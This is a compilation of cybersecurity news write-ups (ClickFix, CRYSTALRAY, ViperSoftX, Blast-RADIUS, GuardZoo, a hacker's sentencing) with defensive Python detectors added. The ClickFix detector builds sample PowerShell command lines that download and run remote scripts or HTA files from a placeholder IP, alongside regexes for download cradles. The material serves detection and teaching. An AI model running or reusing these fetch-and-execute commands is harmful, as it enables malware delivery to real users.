ClickFix Social Engineering Infection Chain

After visitors are redirected from seemingly legitimate sites, on-screen instructions deceive them into pasting base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs state that these commands download and execute malware from remote attacker-controlled command-and-control (C2) servers. [Image: prevalence of ClickFix-delivered DarkGate and Lumma Stealer over the past three months. Source: mcafee.com] Because the victim runs the command in their own session, no exploit or macro is needed, which is what makes the technique so effective. Once active, the malware typically takes steps to evade detection, such as clearing the clipboard contents (removing the pasted command) and running processes in minimized windows, maintains persistence on the victim's system, and steals personal data for exfiltration to a C2 server. The researchers have detailed the use of ClickFix by DarkGate and Lumma Stealer:
  • DarkGate: DarkGate is distributed through phishing emails carrying HTML attachments that masquerade as Microsoft Word documents. When the user opens the attachment, the HTML displays a "How to fix" button that, when clicked, presents base64-encoded commands hiding malicious PowerShell instructions. [Image: DarkGate ClickFix lure. Source: mcafee.com] Once run, the PowerShell commands download and execute an additional HTA file containing further malicious payloads. Once infected, the malware can exfiltrate sensitive information and give the threat actors unauthorized remote access.
  • Lumma Stealer: [Image: Lumma Stealer ClickFix lure. Source: mcafee.com] Lumma Stealer uses the ClickFix technique in a similar way, but visitors are usually greeted directly with a webpage displaying an error message, such as a supposed browser problem, together with instructions to 'fix' the issue. These instructions likewise trick users into entering base64-encoded commands into a PowerShell terminal, which run the Lumma Stealer malware on execution. This lets the stealer bypass traditional security measures while compromising the affected system.
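As a worked example of what a defender can do with these command lines, the following Python helper (added here; it is not McAfee's code) decodes the base64 layers a ClickFix command typically carries, the UTF-16LE -EncodedCommand layer and any FromBase64String(...) layer nested inside it, and flags the behaviours the report describes: a hidden window, a download cradle, in-memory execution, an mshta launch and clipboard clearing. The two sample command lines are constructed for this example in the shape of the two chains above and are not real payloads; the indicator names and regexes are my own and not an exhaustive signature set.

```python
import base64
import binascii
import re

# Behaviours from the report, as regexes over each decoded layer.
# Names are labels for this example, not vendor signatures.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|"
                                  r"DownloadString|DownloadFile|curl|wget)\b", re.I),
    "in_memory_exec":  re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "hta_launch":      re.compile(r"\bmshta(?:\.exe)?\b", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard\s+(?:-Value\s+)?\$null|Clipboard\]::Clear", re.I),
}

# Where base64 payloads sit: the -EncodedCommand switch and inline decode calls.
B64_SWITCH = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)


def decode_blob(blob):
    """Decode one base64 blob; pick UTF-16LE when the NUL pattern shows it."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except (binascii.Error, ValueError):
        return ""
    # -EncodedCommand is always UTF-16LE: for ASCII text every odd byte is NUL.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_layers(cmdline, max_depth=5):
    """Return the command line plus every base64 layer found beneath it."""
    layers, frontier = [cmdline], [cmdline]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            found += [decode_blob(m.group(1)) for m in B64_SWITCH.finditer(text)]
            found += [decode_blob(m.group(1)) for m in B64_CALL.finditer(text)]
        found = [t for t in found if t]
        if not found:
            break
        layers += found
        frontier = found
    return layers


def _scrub(text):
    """Blank out base64 blobs so random blob bytes cannot trip the indicators."""
    text = B64_SWITCH.sub("-enc <b64>", text)
    return B64_CALL.sub("FromBase64String(<b64>)", text)


def classify(cmdline):
    """Set of indicator names matched in any decoded layer."""
    return {name for layer in decode_layers(cmdline)
            for name, rx in INDICATORS.items() if rx.search(_scrub(layer))}


def _enc(script):
    """Build a '-enc' argument the way PowerShell expects it (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed samples modelled on the two chains in the report (not real payloads).
# DarkGate-style: fetch and launch an HTA, then wipe the clipboard.
SAMPLE_HTA = "powershell -w hidden -enc " + _enc(
    "$u='http://203.0.113.10/update.hta'; Set-Clipboard $null; mshta $u")
# Lumma-style: a second base64 layer wrapped in FromBase64String, piped to iex.
_inner = base64.b64encode(b"iwr http://203.0.113.10/p.ps1 -UseBasicParsing | iex").decode()
SAMPLE_IEX = "powershell -nop -w hidden -ec " + _enc(
    "iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + _inner + "')))")
```

Run `classify()` over process-creation events (Sysmon event 1 or EDR telemetry) where the parent is explorer.exe or a browser and the image is powershell.exe; the clipboard-clear indicator in particular is a strong tell, since legitimate scripts almost never wipe the clipboard. The decoder stops at five layers to avoid spinning on self-referential blobs.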

Mitigations and Remediations

To protect against the ClickFix technique and malware such as DarkGate and Lumma stealer, the researchers have shared the following recommendations:
  • Regular training to inform potential victims about social engineering tactics and phishing campaigns.
  • Use of antivirus software on system endpoints.
  • Implementation of robust email and web filtering to block suspicious phishing mails, malicious attachments and malicious websites.
  • Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block malicious traffic on networks.
  • Network segmentation to prevent the spread of malware within organizations.
  • Monitoring of network logs and traffic.
  • Enforcement of the principle of least privilege (PoLP).
  • Implementation of security policies or monitoring over clipboard content, particularly in sensitive environments.
  • Implementation of multi-factor authentication (MFA).
  • Updating operating systems, software and applications to the latest available patched versions.
  • Encrypting stored data and data in transit to protect it from unauthorized access.
  • Regular and secure backup of important data.

Ukrainian Cybercrime Kingpin ‘Tank’ Sentenced to Two Concurrent 9-Year Prison Terms

Tank Sentenced

Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank," has been sentenced to two concurrent nine-year prison terms by a U.S. federal court in Lincoln, Nebraska, for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38-year-old pleaded guilty to two charges: conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard also ordered him to pay more than $73 million in restitution and forfeiture for these crimes.

'Tank' and JabberZeus Crew

Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had pursued Penchukov for over a decade, and his arrest in Switzerland in 2022 brought an end to his criminal career. While leading the Jabber Zeus crew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He later organized the IcedID malware operation, which collected financial details and enabled ransomware to be deployed on infected systems. Investigators found a spreadsheet detailing the $19.9 million that IcedID brought in during 2021. The University of Vermont Medical Center was among the prominent victims of IcedID, losing over $30 million in the attack, with many of the institution's critical patient services unavailable for more than two weeks. Penchukov was charged in connection with that attack by prosecutors in the Eastern District of North Carolina. U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, “Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk.” Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center, testified to the House of Representatives that the center was unable to access its own medical records for 28 days because of the incident. Dr. Leffler stated, “We didn’t have internet.” He added, "We didn’t have phones. It impacted radiology imaging, laboratory results." According to his testimony, the medical center's staff rushed to purchase walkie-talkies to keep services running. Penchukov appeared on the FBI's most-wanted cyber list for over a decade as the recognized leader of the cybercrime gang.
Earlier, prosecutors had stated in court, “The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been identified as a popular DJ, who operated within Ukraine under the moniker of 'DJ Slava Rich.'

Implications of Ruling

The prosecution of Penchukov is a significant milestone in the pursuit of high-value cybercrime targets and shows law enforcement's persistence in the face of international jurisdictional challenges. Western law enforcement authorities have long faced difficulty prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the US government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop—wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises the question of whether Penchukov is cooperating with authorities in ongoing cybercrime investigations: according to court documents, both Penchukov's own lawyer and the US government requested less severe sentences after he pleaded guilty to the two conspiracy charges of participating in racketeering and committing wire fraud. Several charges were dropped following his signing of a plea agreement whose details are not public.

CRYSTALRAY Group Scaled Attacks To Target Over 1500 Victims Worldwide

CRYSTALRAY Group hackers

A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with an arsenal of open-source security tools. Researchers first observed the group's activities in February 2024 and have been tracking its evolving tactics since. The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. Its tactics reflect a concerning trend: the weaponization of legitimate open-source security tools by threat actor groups for illicit financial gain.

CRYSTALRAY Reconnaissance and Initial Access

Researchers from Sysdig observed that the group had significantly scaled up its operations, targeting over 1,500 victims by abusing a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims, using tools that include several from ProjectDiscovery, an open-source project. The group's arsenal includes zmap, asn, httpx, nuclei, Platypus and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deploying them against real-world targets. Operations tend to focus on specific countries, with the United States and China accounting for over half of the observed victims. [Image: chart of targeted countries. Source: sysdig.com] The attackers use the "ASN" tool to generate lists of IP address ranges for the targeted countries, then use "zmap," a high-speed network scanner, to probe those IPs for exploitable services in commonly used platforms such as Confluence, WebLogic and ActiveMQ. httpx is then used to verify that the discovered services are actually running and responding, with an httpx_output.txt file generated to filter out invalid results. Finally, nuclei performs vulnerability scans, identifying CVEs such as CVE-2022-44877 (an arbitrary command execution flaw, in CentOS Web Panel), CVE-2021-3129 (another arbitrary code execution flaw, in the Laravel Ignition debug page) and CVE-2019-18394 (a server-side request forgery, in Openfire).

Lateral Movement, Data Theft and Crypto-Mining

After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in its arsenal is SSH-Snake, an open-source worm that spreads through networks using SSH keys and credentials found on each host it reaches. [Image: CRYSTALRAY lateral movement. Source: sysdig.com] The group goes beyond server compromise to hunt for credentials such as passwords and API keys for popular cloud providers, stored as environment variables or in files such as .env configurations, which could let it extend its reach into victims' cloud infrastructure. The group has automated SSH-Snake to extract credential data and exfiltrate it to attacker-owned command-and-control servers. Finally, the group deploys cryptominers on breached systems, hijacking the host's processing power, with a script that kills any existing cryptominers to maximize profit. The researchers traced the deployed mining workers to a specific pool and found they were earning roughly $200 a month; starting in April, however, the group switched to a new configuration, making it impossible to determine its current revenue. The researchers offer the following recommendations to protect against these attacks:
  • Reduce the cloud attack surface through sound vulnerability, identity and secrets management, so that automated attacks find nothing to exploit.
  • Organizations that must expose applications to the public Internet face additional risk and should prioritize vulnerability remediation for those assets.
  • Runtime detection that lets organizations spot successful attacks and remediate immediately, with forensic data retained to determine the root cause.
The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.
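The SSH-Snake stage described above leaves a trace that does not depend on recognizing the tool: one source host completing key-based logins to many other hosts within a short window. The following Python, added here and not part of Sysdig's report, applies that fan-out check to a handful of constructed sshd "Accepted" lines as they would arrive at a central log host; the hostnames, addresses, thresholds and the assumed log year are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines (syslog prefix + OpenSSH "Accepted" message) from
# several hosts, as a log collector would see them. 10.0.5.14 fans out to four
# hosts in eight seconds, including a root login; 10.0.9.2 is ordinary use.
SAMPLE_LOGS = """\
Jul 10 03:12:01 web-01 sshd[4120]: Accepted publickey for deploy from 10.0.5.14 port 51022 ssh2: RSA SHA256:aaaa
Jul 10 03:12:03 db-01 sshd[2210]: Accepted publickey for root from 10.0.5.14 port 51030 ssh2: RSA SHA256:aaaa
Jul 10 03:12:07 cache-01 sshd[998]: Accepted publickey for deploy from 10.0.5.14 port 51041 ssh2: ED25519 SHA256:bbbb
Jul 10 03:12:09 build-02 sshd[3301]: Accepted publickey for ci from 10.0.5.14 port 51044 ssh2: RSA SHA256:aaaa
Jul 10 03:40:00 web-01 sshd[4188]: Accepted publickey for deploy from 10.0.9.2 port 40000 ssh2: RSA SHA256:cccc
Jul 10 09:15:00 db-01 sshd[2290]: Accepted password for alice from 10.0.9.2 port 40100 ssh2
"""

ACCEPTED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port")


def parse_accepted(logs, year=2024):
    """Return (timestamp, src_ip, dst_host, user, method) for each Accepted line."""
    events = []
    for line in logs.splitlines():
        m = ACCEPTED.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], m["host"], m["user"], m["method"]))
    return events


def find_fan_out(events, window_seconds=300, min_hosts=3):
    """Sources that log in to >= min_hosts distinct hosts within window_seconds.

    Returns {src_ip: {"first": datetime, "hosts": [...], "users": [...]}} with
    the widest fan-out seen for that source, using a sliding window over the
    source's events in time order.
    """
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[1]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        best, start = None, 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            span = evs[start:end + 1]
            hosts = {e[2] for e in span}
            if len(hosts) >= min_hosts and (best is None or len(hosts) > len(best["hosts"])):
                best = {"first": span[0][0],
                        "hosts": sorted(hosts),
                        "users": sorted({e[3] for e in span})}
        if best:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    for src, hit in find_fan_out(parse_accepted(SAMPLE_LOGS)).items():
        print(f"{src}: {len(hit['hosts'])} hosts from {hit['first']} "
              f"users={hit['users']} hosts={hit['hosts']}")
```

Tune `min_hosts` and the window to the environment (a legitimate configuration-management host will also fan out, so allow-list it rather than raising the threshold), and pay particular attention to hits that include root or service accounts on hosts the source has never reached before.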

Researchers Observe Improvements in ViperSoftX Info-Stealing Malware Distributed Through eBooks

ViperSoftX Info-Stealing Malware

Researchers have observed improvements in the ViperSoftX info-stealing malware, first spotted in 2020. The malware has moved toward more sophisticated evasion tactics, notably using the Common Language Runtime (CLR) to run PowerShell commands from within AutoIt scripts distributed inside pirated eBook copies. This trick lets the malware blend in with legitimate system activity, making it harder for security solutions to spot.

ViperSoftX Distributed as Trojan Horse in eBooks

[Image: the mechanics of ViperSoftX. Source: www.trellix.com] ViperSoftX spreads through torrent sites, masquerading as eBooks. The infection chain begins when the user opens the downloaded RAR archive, which contains a hidden folder, a deceptive shortcut file that appears to be a harmless PDF or eBook, and a PowerShell script, AutoIt.exe and an AutoIt script that all pose as simple JPG image files. [Image: contents of the ViperSoftX archive. Source: www.trellix.com] When the user clicks the shortcut, it starts a command sequence that begins by listing the contents of "zz1Cover4.jpg". It then reads each line of this file, in which commands are hidden behind long runs of blank spaces, into a PowerShell command prompt, effectively automating the execution of multiple commands. The researchers from Trellix state that the PowerShell code performs several actions, including unhiding the hidden folder, calculating the total size of all disk drives, and configuring Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in, establishing persistence on the infected system. The malware also copies two files to the %APPDATA%\Microsoft\Windows directory, renaming one to a .au3 script and the other to AutoIt3.exe.

Increasing ViperSoftX Sophistication

The malware's use of CLR to run PowerShell within AutoIt is particularly sneaky. AutoIt, normally used to automate Windows tasks, is often trusted by security software, and by piggybacking on that trust ViperSoftX can fly under the radar. The malware has additional tricks up its sleeve in the form of heavy obfuscation, deception and encryption to hide its true nature. ViperSoftX uses heavy Base64 obfuscation and AES encryption to hide the commands in the PowerShell scripts extracted from the image decoy files. This level of obfuscation challenges both researchers and analysis tools, making it harder to decipher the malware's functionality and intent. The malware even attempts to modify the Antimalware Scan Interface (AMSI) to bypass security checks run against its scripts. By building on existing scripts, the malware developers accelerate development and focus on improving their evasion tactics. Analysis of the malware's network activity shows attempts to blend its traffic with legitimate system activity: researchers observed deceptive hostnames such as security-microsoft[.]com, chosen so that victims associate the traffic with Microsoft. Analysis of a suspicious Base64-encoded User-Agent string revealed a detailed set of system information gathered through PowerShell on the infected system, including the logical disk volume serial number, computer name, username, operating system version, antivirus product information and cryptocurrency details. The researchers warn of the increasing sophistication of ViperSoftX's operations, as its ability to execute malicious functions while evading traditional security measures makes it a formidable opponent.
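The Base64 User-Agent is a cheap thing to hunt for in proxy logs. The following Python, added here and not part of Trellix's analysis, checks the User-Agent field of combined-format access lines for a string shaped like Base64 that decodes to printable text, then splits the result into fields. The log lines, the addresses and the "key=value|key=value" field layout are constructed for the example; ViperSoftX's actual field format is not described in the report.

```python
import base64
import binascii
import re
import string

# Constructed host profile in an assumed "key=value|key=value" layout.
HOST_PROFILE = "SN=1A2B-3C4D|PC=WS-042|USER=jdoe|OS=10.0.19045|AV=Windows Defender|WALLET=none"

# Constructed combined-format access lines. Only the second carries an encoded UA.
SAMPLE_LOGS = [
    '10.1.2.3 - - [12/Jul/2024:10:00:01 +0000] "GET /update HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.1.2.3 - - [12/Jul/2024:10:00:05 +0000] "GET /api HTTP/1.1" 200 77 "-" '
    '"' + base64.b64encode(HOST_PROFILE.encode()).decode() + '"',
    '10.1.2.9 - - [12/Jul/2024:10:00:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl/8.4.0"',
]

UA_FIELD = re.compile(r'"([^"]*)"\s*$')          # last quoted field is the User-Agent
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_user_agent(ua):
    """Decoded text if `ua` is well-formed Base64 of printable UTF-8, else None."""
    if len(ua) % 4 or not B64_SHAPE.match(ua):
        return None
    try:
        text = base64.b64decode(ua, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def find_encoded_user_agents(lines):
    """Return [{"src", "decoded", "fields"}] for lines whose User-Agent decodes."""
    hits = []
    for line in lines:
        m = UA_FIELD.search(line)
        if not m:
            continue
        decoded = decode_user_agent(m.group(1))
        if decoded is None:
            continue
        # Field split assumes the layout used in HOST_PROFILE above.
        fields = dict(kv.split("=", 1) for kv in decoded.split("|") if "=" in kv)
        hits.append({"src": line.split(" ", 1)[0], "decoded": decoded, "fields": fields})
    return hits
```

Real browser and tool User-Agents contain spaces, slashes and parentheses and so never pass the shape test, which keeps false positives low; the 16-character minimum and the printable-text requirement filter out the short tokens and binary values that happen to be valid Base64. Pair a hit with the destination hostname, since this family also hides behind look-alike names such as security-microsoft[.]com.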

Blast-RADIUS Vulnerability Affects Widely-Used RADIUS Authentication Protocol

Blast-RADIUS Attack RADIUS Authentication Protocol

A critical vulnerability in the widely used RADIUS authentication protocol could allow attackers to gain unauthorized access to networks and devices, researchers have discovered. The flaw, dubbed "Blast-RADIUS," affects a protocol that has been a cornerstone of network infrastructure for decades. RADIUS, which stands for Remote Authentication Dial-In User Service, is used by nearly every switch, router, access point and VPN concentrator sold in the last 20 years. It verifies user credentials for remote access to networked devices, including network routers and switches, industrial control systems, VPNs, ISPs using DSL or FTTH, 2G and 3G cellular roaming, and 5G DNN authentication.

The Blast-RADIUS Attack

Researchers from several universities and private firms found that a man-in-the-middle attacker can exploit a weakness in how the RADIUS protocol authenticates server responses. By injecting attacker-chosen data into a legitimate authentication request, the attacker can forge a valid "Access-Accept" message in response to a failed login attempt. [Image: the Blast-RADIUS attack against the protocol. Source: blastradius.fail] This lets the attacker turn a reject into an accept and assign themselves arbitrary network privileges. The attack abuses the MD5 hash function, which RADIUS uses to compute the Response Authenticator as an MD5 hash of the response packet followed by the shared secret, and which has long been known to be vulnerable to chosen-prefix collisions. Using such a collision, the attacker constructs a forged response whose Response Authenticator matches the one the genuine server will produce, without any knowledge of the shared secret between client and server. [Image: the Blast-RADIUS vulnerability. Source: blastradius.fail] While MD5 collisions have been known since 2004, the researchers state that their technique is considerably more complex than earlier MD5 collision attacks, and MD5 collisions had not previously been considered a practical way to exploit RADIUS. The attack has to run online: the attacker must compute the chosen-prefix MD5 collision in real time, within the minutes or seconds before the client gives up waiting for a response. The best previously reported chosen-prefix collision attack took hours, and produced collisions that were not compatible with the RADIUS packet format. The Blast-RADIUS technique incorporates several improvements in speed, space and scaling over existing MD5 attacks, bringing the collision within the window needed to compromise the protocol.
The proof-of-concept attacks described in the paper took about 3 to 6 minutes to compute the MD5 chosen-prefix collision, longer than the 30- to 60-second timeouts commonly used for RADIUS in practice, but each step of the new collision algorithm parallelizes well and leaves room for hardware optimization. The researchers expect that a well-resourced attacker could run the attack tens or hundreds of times faster on better GPUs, FPGAs or other specialized hardware. Blast-RADIUS affects all known RADIUS implementations that use non-EAP authentication methods (such as PAP, CHAP and MS-CHAPv2) over UDP, including the widely deployed FreeRADIUS. The researchers disclosed the vulnerability to the IETF (Internet Engineering Task Force) and CERT (Computer Emergency Readiness Team) and expect the major RADIUS implementations to ship patches that require the Message-Authenticator attribute, an HMAC keyed with the shared secret, in every request and response.
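To see what the Response Authenticator protects and what the Message-Authenticator fix adds, here is a small Python model of both checks on the client side, added here; it is not the researchers' code and does not reproduce the collision itself. A legacy client verifies only MD5(Code, ID, Length, Request Authenticator, Attributes, Secret), the value Blast-RADIUS forges. A hardened client additionally requires a Message-Authenticator attribute (type 80, RFC 2869) and verifies its HMAC-MD5 under the shared secret, which a collision on the outer MD5 does not help with. The shared secret, identifier and attributes are constructed for the example.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3
ATTR_USER_NAME = 1
ATTR_MESSAGE_AUTHENTICATOR = 80          # RFC 2869 section 5.14, value is 16 bytes
HEADER = struct.Struct("!BBH")           # Code, Identifier, Length


def encode_attrs(attrs):
    """Encode [(type, value_bytes), ...] as RADIUS TLVs: type, length, value."""
    return b"".join(struct.pack("!BB", t, len(v) + 2) + v for t, v in attrs)


def parse_attrs(blob):
    attrs, i = [], 0
    while i < len(blob):
        if i + 2 > len(blob):
            raise ValueError("truncated attribute header")
        t, n = blob[i], blob[i + 1]
        if n < 2 or i + n > len(blob):
            raise ValueError("bad attribute length")
        attrs.append((t, blob[i + 2:i + n]))
        i += n
    return attrs


def response_authenticator(code, ident, length, request_auth, attr_bytes, secret):
    """RFC 2865: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).

    The secret is only a suffix of the hashed data, which is what lets a
    chosen-prefix MD5 collision on the packet body yield a matching value.
    """
    return hashlib.md5(HEADER.pack(code, ident, length) + request_auth
                       + attr_bytes + secret).digest()


def message_authenticator(code, ident, length, request_auth, attrs, secret):
    """HMAC-MD5 over the packet with the Message-Authenticator value zeroed.

    For responses, the Authenticator field used here is the Request Authenticator.
    """
    zeroed = encode_attrs([(t, bytes(16) if t == ATTR_MESSAGE_AUTHENTICATOR else v)
                           for t, v in attrs])
    return hmac.new(secret, HEADER.pack(code, ident, length) + request_auth + zeroed,
                    hashlib.md5).digest()


def build_response(code, ident, request_auth, attrs, secret, with_msg_auth=True):
    """Build an Access-Accept/Reject the way a server would."""
    if with_msg_auth:
        attrs = attrs + [(ATTR_MESSAGE_AUTHENTICATOR, bytes(16))]
    length = 20 + len(encode_attrs(attrs))
    if with_msg_auth:
        mac = message_authenticator(code, ident, length, request_auth, attrs, secret)
        attrs = attrs[:-1] + [(ATTR_MESSAGE_AUTHENTICATOR, mac)]
    attr_bytes = encode_attrs(attrs)
    resp_auth = response_authenticator(code, ident, length, request_auth, attr_bytes, secret)
    return HEADER.pack(code, ident, length) + resp_auth + attr_bytes


def verify_response(pkt, request_auth, secret, require_msg_auth):
    """Client-side check; require_msg_auth=False is the pre-Blast-RADIUS behaviour."""
    if len(pkt) < 20:
        return False
    code, ident, length = HEADER.unpack(pkt[:4])
    if length != len(pkt):
        return False
    resp_auth, attr_bytes = pkt[4:20], pkt[20:]
    expected = response_authenticator(code, ident, length, request_auth, attr_bytes, secret)
    if not hmac.compare_digest(resp_auth, expected):
        return False                      # legacy check, forgeable by the collision
    try:
        attrs = parse_attrs(attr_bytes)
    except ValueError:
        return False
    macs = [v for t, v in attrs if t == ATTR_MESSAGE_AUTHENTICATOR]
    if not macs:
        return not require_msg_auth       # hardened clients drop unauthenticated responses
    if len(macs) != 1 or len(macs[0]) != 16:
        return False
    expected_mac = message_authenticator(code, ident, length, request_auth, attrs, secret)
    return hmac.compare_digest(macs[0], expected_mac)


def demo():
    """Legacy vs hardened client on a response with and without Message-Authenticator."""
    secret = b"testing123"                # constructed shared secret
    request_auth = os.urandom(16)         # the client's Request Authenticator
    attrs = [(ATTR_USER_NAME, b"alice")]
    signed = build_response(ACCESS_ACCEPT, 7, request_auth, attrs, secret)
    unsigned = build_response(ACCESS_ACCEPT, 7, request_auth, attrs, secret, with_msg_auth=False)
    return {
        "signed_hardened": verify_response(signed, request_auth, secret, True),
        "unsigned_legacy": verify_response(unsigned, request_auth, secret, False),
        "unsigned_hardened": verify_response(unsigned, request_auth, secret, True),
    }
```

The practical check is the `require_msg_auth=True` path: once both sides are patched, a client that still accepts a response without a Message-Authenticator is still exposed, so the setting has to be enforced, not merely supported. Until then, moving the transport to RADIUS over TLS removes the man-in-the-middle position the attack needs in the first place.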

RADIUS Mitigation and Future Outlook

The IETF RADEXT working group is said to be working on standardizing RADIUS over TLS and DTLS as a more secure alternative, which the researchers state would mitigate Blast-RADIUS because the transport is then encrypted and authenticated. While the major RADIUS implementations are releasing patches to mitigate the vulnerability, the researchers say the attack demonstrates the need to move away from the aging protocol entirely. In the meantime, they urge system administrators to check with vendors for patches and to follow best practices for secure RADIUS configuration. The Blast-RADIUS attack is a reminder that even long-standing protocols can harbor critical flaws, and that as network deployments grow more complex, these technologies need continued scrutiny to remain secure.

Houthi-Deployed Android Surveillance Tool ‘GuardZoo’ Targeted Middle Eastern Militaries

GuardZoo houthi

Cybersecurity researchers observed an Android surveillance campaign active since October 2019 that has targeted the military personnel of various countries in the Middle East. The researchers believe the operation has ties to a Houthi-aligned threat actor. Referred to as "GuardZoo," the spyware has infected devices belonging to more than 450 victims. The campaign remains active with researchers still analyzing related activity.

GuardZoo Infection of Middle Eastern Military Targets

GuardZoo is based on Dendroid RAT, a commodity Android RAT once sold underground for $300 together with a binding utility for trojanizing legitimate apps, whose source code leaked online in 2014. Researchers noted many modifications to the original source code to add capabilities while removing some unused functions. GuardZoo uses a new C2 backend written in ASP.NET instead of relying on Dendroid's native PHP web panel for command and control (C2). Researchers from Lookout attribute the campaign to a Yemeni, Houthi-aligned threat actor based on the application lures, the exfiltrated data, the targeting, and the location of the C2 infrastructure. The campaign has primarily targeted victims in Yemen, Saudi Arabia, Egypt, Oman, the UAE, Qatar and Turkey. [Image: Houthi surveillanceware GuardZoo targeting the Middle East. Source: www.lookout.com] [Image: GuardZoo overview. Source: www.lookout.com] The researchers observed two C2 addresses: a primary, https://wwwgoogl.zapto[.]org, and a backup, https://somrasdc.ddns[.]net. The malware can receive over 60 different commands from these servers, most of them implementations specific to GuardZoo. The researchers compiled a list of the most notable C2 commands and their functions: [Image: table of notable GuardZoo C2 commands. Source: www.lookout.com] GuardZoo can collect a wide range of data from infected devices, including photos, documents, location data, saved GPS routes and tracks, device model number, mobile carrier, and Wi-Fi configuration.
Moreover, it lets the actor deploy additional invasive malware on the infected device. The surveillanceware is distributed via WhatsApp, WhatsApp Business and direct browser download, and uses military themes to lure victims. Lookout researchers have observed recent samples of GuardZoo posing as religious, e-book and military-themed apps, such as 'The Holy Quran,' 'Constitution of the Armed Forces,' 'Limited - Commander and Staff,' and 'Restructuring of the New Armed Forces.' [Image: GuardZoo lure apps targeting Middle Eastern militaries. Source: www.lookout.com]

Researchers Trace Houthi Connection

Researchers found evidence linking GuardZoo to Yemen's Houthi militia, which the U.S. government recently redesignated as a global terrorist group. Analysis of server logs revealed that many of the identified victims appeared to be members of the pro-Hadi forces in Yemen. The malware's C2 servers were also found to be hosted on YemenNet infrastructure, an ISP owned by the Yemeni state. Some log entries indicated that the devices belonged to forces aligned with President Hadi's government, which operates from Aden. One of the exfiltrated documents contained phrases that translate to “Very Confidential, Republic of Yemen, Ministry of Defense, Chief of the General Staff, War Operations Department, Insurance division.”

Protection Against GuardZoo

Aaron Cockerill, Executive Vice President of Product & Security at the security firm, stated, “These spyware packages can be used to collect a wide range of data from infected devices, which in the case of GuardZoo, could put military personnel and operations at risk. We urge security professionals to be aware of this threat and to take steps to protect their users, and work and personal data.” To protect both business and personal Android devices from GuardZoo and other surveillanceware, the researchers have recommended the following basic steps:
  • Keep your operating system and apps up to date, as most updates nowadays are related to security patches.
  • Only install apps from Google Play, not third-party sources. If you receive a message asking you to install an app from a website, immediately block the number and report the incident to your IT or Security team.
  • Be mindful of the permissions that mobile apps ask for. Overly invasive permissions, even from legitimate apps, could create data risk for your organization.
  • Implement a mobile security solution that can detect and protect against malware and keep your organization safe.

FBI Releases Joint Advisory on Russian AI Tool Used to Sow Disinformation On Social Media

Meliorator Bot FBI

